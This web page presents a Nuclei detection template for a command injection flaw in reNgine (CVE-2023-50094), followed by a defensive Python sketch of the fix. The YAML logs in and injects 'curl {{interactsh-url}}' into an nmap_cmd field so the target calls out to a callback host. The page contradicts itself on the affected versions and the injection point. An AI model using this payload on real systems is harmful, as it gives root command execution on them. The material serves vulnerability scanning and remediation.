reNgine 2.2.0 - Command Injection
ID: CVE-2023-50094
Severity: high
Author: Zierax
Tags: cve,cve2023,rengine,rce,injection,authenticated
Description
reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
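The root cause named in the description is user input reaching a shell through subprocess.check_output. One way to close it, as an added Python sketch that is not reNgine's code: `TOOL`, the placeholder name `waf-tool` and all function names are assumptions, and the stand-in tool only echoes its arguments so the block runs offline.

```python
import re
import subprocess
import sys
from urllib.parse import urlsplit

# Stand-in for the external WAF-detection binary (assumption): it prints the
# arguments it received, so the example runs offline.
TOOL = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]

ALLOWED = re.compile(r"[A-Za-z0-9._~:/?#@&=%+,-]+")  # no ; | $ ` ( ) quotes or spaces
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOST = re.compile(rf"{LABEL}(?:\.{LABEL})*")


def unsafe_command(url: str) -> str:
    """Vulnerable pattern: one string that a shell would parse (built, never run)."""
    return f"waf-tool {url}"  # 'waf-tool' is a placeholder name


def validate_target(url: str) -> str:
    """Return url unchanged if it is a plain http(s) URL, else raise ValueError."""
    if not ALLOWED.fullmatch(url):
        raise ValueError("disallowed character in url")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http and https targets are accepted")
    if not parts.hostname or not HOST.fullmatch(parts.hostname):
        raise ValueError("invalid hostname")
    return url


def run_tool(arg: str) -> str:
    """argv list and no shell=True: arg reaches the tool as one literal argument."""
    return subprocess.check_output(TOOL + [arg], text=True, timeout=10).strip()


def detect_waf(url: str) -> str:
    """Hardened handler body: validate first, then execute without a shell."""
    return run_tool(validate_target(url))


if __name__ == "__main__":
    hostile = "https://example.com;echo INJECTED"  # constructed input
    print(unsafe_command(hostile))   # a shell would split this at ';'
    print(run_tool(hostile))         # metacharacters stay inside one argument
    print(detect_waf("https://example.com/"))
```

The argv list is the actual fix; the allowlist is defence in depth, and neither changes the fact that the description reports the tool running as root.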
YAML Source
id: CVE-2023-50094

info:
  name: reNgine 2.2.0 - Command Injection
  author: Zierax
  severity: high
  description: |
    reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
  reference:
    - https://github.com/yogeshojha/rengine
    - https://github.com/Zierax/CVE-2023-50094_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50094
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-50094
    cwe-id: CWE-78
    cpe: cpe:2.3:a:yogeshojha::*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: yogeshojha
    product: rengine
    shodan-query: title:"reNgine"
  tags: cve,cve2023,rengine,rce,injection,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "rengine")'
        internal: true

  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        POST /scan-engine/update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"nmap_cmd": 'curl {{interactsh-url}}'}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol_2, "dns")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100fd49889ceee844270469df825dc24d149b0ad1cfcea1e5c1da8cf5c6cc451121022100a5c21df8088029d5251638baab6d55f0d7a800c75322da1f97e7a0208051f70f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50094.yaml"